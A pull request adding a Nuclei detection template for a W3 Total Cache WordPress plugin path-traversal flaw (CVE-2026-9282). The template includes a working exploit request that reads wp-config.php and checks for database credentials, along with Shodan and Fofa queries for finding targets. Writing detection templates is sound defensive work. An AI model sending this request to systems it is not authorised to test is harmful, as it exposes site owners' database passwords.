### PR TITLE
Clarify CVE-2026-9282.yaml - W3 Total Cache <= 2.9.4 - Unauthenticated Arbitrary File Read

### DIFF
--- a/http/cves/2026/CVE-2026-9282.yaml
+++ b/http/cves/2026/CVE-2026-9282.yaml
@@ -1,0 +1,76 @@
+id: CVE-2026-9282
+
+info:
+  name: W3 Total Cache <= 2.9.4 - Unauthenticated Arbitrary File Read
+  author: 0x_Akoko
+  severity: high
+  description: |
+   W3 Total Cache WordPress plugin <= 2.9.4 contains a directory traversal caused by improper handling in setupSources function, letting unauthenticated attackers read arbitrary files, exploit requires manual minify mode enabled with specific filename.
+  impact: |
+   Unauthenticated attackers can read arbitrary files, potentially exposing sensitive information on the server.
+  remediation: |
+   Update to the latest version beyond 2.9.4.
+  reference:
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e92cc06d-006f-4bba-a4ef-b23d80c00085
+    - https://plugins.trac.wordpress.org/browser/w3-total-cache/tags/2.9.4/Minify_MinifiedFileRequestHandler.php#L191
+    - https://plugins.trac.wordpress.org/browser/w3-total-cache/tags/2.9.4/lib/Minify/Minify/Controller/MinApp.php#L108
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-9282
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: boldgrid
+    product: w3-total-cache
+    fofa-query: body="/wp-content/plugins/w3-total-cache/"
+    shodan-query: http.html:"w3-total-cache"
+    tags: cve,cve2026,wordpress,wp-plugin,w3-total-cache,lfi,unauth,disclosure
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "/wp-content/cache/minify/")'
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        name: theme_key
+        internal: true
+        part: body
+        group: 1
+        regex:
+          - '/wp-content/cache/minify/([a-f0-9]+)\.[^./"]+\.include(?:-(?:footer|body))?\.[a-f0-9]+\.(?:css|js)'
+
+      - type: regex
+        name: template_key
+        internal: true
+        part: body
+        group: 1
+        regex:
+          - '/wp-content/cache/minify/[a-f0-9]+\.([^./"]+)\.include(?:-(?:footer|body))?\.[a-f0-9]+\.(?:css|js)'
+
+  - raw:
+      - |
+        GET /?w3tc_minify={{theme_key}}.{{template_key}}.include.{{theme_key}}.css&f_array[]=wp-config.php HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "text/css")'
+          - 'contains(body, "DB_PASSWORD")'
+          - 'contains(body, "DB_NAME")'
+        condition: and


### PR DESCRIPTION
Updated the CVE entry name for clarity.

### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
